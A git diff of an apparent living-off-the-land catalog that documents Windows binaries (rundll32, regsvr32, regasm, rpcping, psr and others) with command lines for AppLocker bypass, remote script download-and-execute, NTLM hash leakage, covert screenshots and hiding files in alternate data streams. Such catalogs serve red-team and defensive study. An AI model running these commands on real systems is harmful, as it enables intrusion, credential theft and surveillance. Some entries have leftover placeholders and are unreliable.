Description: Executes the target XAML Browser Application (XBAP) file.
Full Path:
- 'c:\windows\system32\PresentationHost.exe '
- 'c:\windows\sysWOW64\PresentationHost.exe '
Code Sample: []
Detection: []
Resources:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Notes: Thanks to Casey Smith - @subtee

24
OSBinaries/Print.exe.md Normal file
View File

@@ -0,0 +1,24 @@
## Print.exe
* Functions: Download, Copy, Add ADS
```
print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
```
* Resources:
* https://twitter.com/Oddvarmoe/status/985518877076541440
* https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
* Full path:
* C:\Windows\System32\print.exe
* C:\Windows\SysWOW64\print.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

23
OSBinaries/Print.yml
View File

@@ -1,23 +0,0 @@
---
Name: Print.exe
Description: Download, Copy, Add ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Full Path:
- C:\Windows\System32\print.exe
- C:\Windows\SysWOW64\print.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/Oddvarmoe/status/985518877076541440
- https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Notes: Thanks to Oddvar Moe - @oddvarmoe

23
OSBinaries/Psr.exe.md Normal file
View File

@@ -0,0 +1,23 @@
## Psr.exe
* Functions: Surveillance
```
psr.exe /start /gui 0 /output c:\users\user\out.zip
Capture screenshots of the desktop and save them in the target .ZIP file.
psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
psr.exe /stop
Stop the Problem Step Recorder.
```
* Resources:
* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
* Full path:
* C:\Windows\System32\Psr.exe
* C:\Windows\SysWOW64\Psr.exe
* Notes: Thanks to

22
OSBinaries/Psr.yml
View File

@@ -1,22 +0,0 @@
---
Name: Psr.exe
Description: Surveillance
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
Description: Capture screenshots of the desktop and save them in the target .ZIP file.
- Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
- Command: psr.exe /stop
Description: Stop the Problem Step Recorder.
Full Path:
- C:\Windows\System32\Psr.exe
- C:\Windows\SysWOW64\Psr.exe
Code Sample: []
Detection: []
Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Notes: 'Thanks to '

18
OSBinaries/Reg.yml
View File

@@ -1,18 +0,0 @@
---
Name: reg.exe
Description: Export Reg, Add ADS, Import Reg
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file.
Full Path:
- c:\windows\system32\reg.exe
- c:\windows\sysWOW64\reg.exe
Code Sample: []
Detection: []
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe

25
OSBinaries/Regasm.exe.md Normal file
View File

@@ -0,0 +1,25 @@
## Regasm.exe
* Functions: Execute
```
regasm.exe /U AllTheThingsx64.dll
Loads the target .DLL file and executes the UnRegisterClass function.
regasm.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
* Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
* Notes: Thanks to Casey Smith - @subtee

25
OSBinaries/Regasm.yml
View File

@@ -1,25 +0,0 @@
---
Name: Regasm.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee

20
OSBinaries/Regedit.yml
View File

@@ -1,20 +0,0 @@
---
Name: regedit.exe
Description: Write ADS, Read ADS, Import registry
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
- Command: regedit C:\ads\file.txt:regfile.reg"
Description: Import the target .REG file into the Registry.
Full Path:
- C:\Windows\System32\regedit.exe
- C:\Windows\SysWOW64\regedit.exe
Code Sample: []
Detection: []
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe

17
OSBinaries/Register-cimprovider.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Register-cimprovider.exe
* Functions: Execute
```
Register-cimprovider -path "C:\folder\evil.dll"
Load the target .DLL.
```
* Resources:
* https://twitter.com/PhilipTsukerman/status/992021361106268161
* Full path:
* c:\windows\system32\Register-cimprovider.exe
* c:\windows\sysWOW64\Register-cimprovider.exe
* Notes: Thanks to PhilipTsukerman - @PhilipTsukerman

18
OSBinaries/Register-cimprovider.yml
View File

@@ -1,18 +0,0 @@
---
Name: Register-cimprovider.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL.
Full Path:
- c:\windows\system32\Register-cimprovider.exe
- c:\windows\sysWOW64\Register-cimprovider.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/PhilipTsukerman/status/992021361106268161
Notes: Thanks to PhilipTsukerman - @PhilipTsukerman

22
OSBinaries/Regsvcs.exe.md Normal file
View File

@@ -0,0 +1,22 @@
## Regsvcs.exe
* Functions: Execute
```
regsvcs.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
* Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
* Notes: Thanks to Casey Smith - @subtee

23
OSBinaries/Regsvcs.yml
View File

@@ -1,23 +0,0 @@
---
Name: Regsvcs.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee

22
OSBinaries/Regsvr32.exe.md Normal file
View File

@@ -0,0 +1,22 @@
## Regsvr32.exe
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll.
Execute the specified local .SCT script with scrobj.dll.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
* Full path:
* C:\Windows\System32\regsvr32.exe
* C:\Windows\SysWOW64\regsvr32.exe
* Notes: Thanks to Casey Smith - @subtee

22
OSBinaries/Regsvr32.yml
View File

@@ -1,22 +0,0 @@
---
Name: Regsvr32.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
- Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Full Path:
- C:\Windows\System32\regsvr32.exe
- C:\Windows\SysWOW64\regsvr32.exe
Code Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
Notes: Thanks to Casey Smith - @subtee

21
OSBinaries/Replace.exe.md Normal file
View File

@@ -0,0 +1,21 @@
## Replace.exe
* Functions: Copy, Download
```
replace.exe C:\Source\File.cab C:\Destination /A
Copy the specified file to the destination folder.
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Copy the specified file to the destination folder.
```
* Resources:
* https://twitter.com/elceef/status/986334113941655553
* https://twitter.com/elceef/status/986842299861782529
* Full path:
* C:\Windows\System32\replace.exe
* C:\Windows\SysWOW64\replace.exe
* Notes: Thanks to elceef - @elceef

21
OSBinaries/Replace.yml
View File

@@ -1,21 +0,0 @@
---
Name: Replace.exe
Description: Copy, Download
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy the specified file to the destination folder.
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Copy the specified file to the destination folder.
Full Path:
- C:\Windows\System32\replace.exe
- C:\Windows\SysWOW64\replace.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/elceef/status/986334113941655553
- https://twitter.com/elceef/status/986842299861782529
Notes: Thanks to elceef - @elceef

20
OSBinaries/Robocopy.exe.md Normal file
View File

@@ -0,0 +1,20 @@
## Robocopy.exe
* Functions: Copy
```
Robocopy.exe C:\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
```
* Resources:
* https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
* Full path:
* c:\windows\system32\binary.exe
* c:\windows\sysWOW64\binary.exe
* Notes: Thanks to Name of guy - @twitterhandle

20
OSBinaries/Robocopy.yml
View File

@@ -1,20 +0,0 @@
---
Name: Robocopy.exe
Description: Copy
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
Description: Copy the entire contents of the SourceFolder to the DestFolder.
- Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Description: Copy the entire contents of the SourceFolder to the DestFolder.
Full Path:
- c:\windows\system32\binary.exe
- c:\windows\sysWOW64\binary.exe
Code Sample: []
Detection: []
Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Notes: Thanks to Name of guy - @twitterhandle

26
OSBinaries/Rpcping.exe.md Normal file
View File

@@ -0,0 +1,26 @@
## Rpcping.exe
* Functions: Credentials
```
rpcping -s 127.0.0.1 -t ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 192.168.1.10 -ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
```
* Resources:
* https://twitter.com/subtee/status/872797890539913216
* https://github.com/vysec/RedTips
* https://twitter.com/vysecurity/status/974806438316072960
* https://twitter.com/vysecurity/status/873181705024266241
* Full path:
* C:\Windows\System32\rpcping.exe
* C:\Windows\SysWOW64\rpcping.exe
* Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity

25
OSBinaries/Rpcping.yml
View File

@@ -1,25 +0,0 @@
---
Name: Rpcping.exe
Description: Credentials
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: rpcping -s 127.0.0.1 -t ncacn_np
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
- Command: rpcping -s 192.168.1.10 -ncacn_np
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Full Path:
- C:\Windows\System32\rpcping.exe
- C:\Windows\SysWOW64\rpcping.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/subtee/status/872797890539913216
- https://github.com/vysec/RedTips
- https://twitter.com/vysecurity/status/974806438316072960
- https://twitter.com/vysecurity/status/873181705024266241
Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity

36
OSBinaries/Rundll32.exe.md Normal file
View File

@@ -0,0 +1,36 @@
## Rundll32.exe
* Functions: Execute, Read ADS
```
rundll32.exe AllTheThingsx64,EntryPoint
Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\System32\rundll32.exe
* C:\Windows\SysWOW64\rundll32.exe
* Notes: Thanks to Casey Smith - @subtee

32
OSBinaries/Rundll32.yml
View File

@@ -1,32 +0,0 @@
---
Name: Rundll32.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Full Path:
- C:\Windows\System32\rundll32.exe
- C:\Windows\SysWOW64\rundll32.exe
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Runonce.exe.md Normal file
View File

@@ -0,0 +1,19 @@
## Runonce.exe
* Functions: Execute
```
Runonce.exe /AlternateShellStartup
Executes a Run Once Task that has been configured in the registry.
```
* Resources:
* https://twitter.com/pabraeken/status/990717080805789697
* https://cmatskas.com/configure-a-runonce-task-on-windows/
* Full path:
* c:\windows\system32\runonce.exe
* c:\windows\sysWOW64\runonce.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Requires Administrative access.

Some files were not shown because too many files have changed in this diff Show More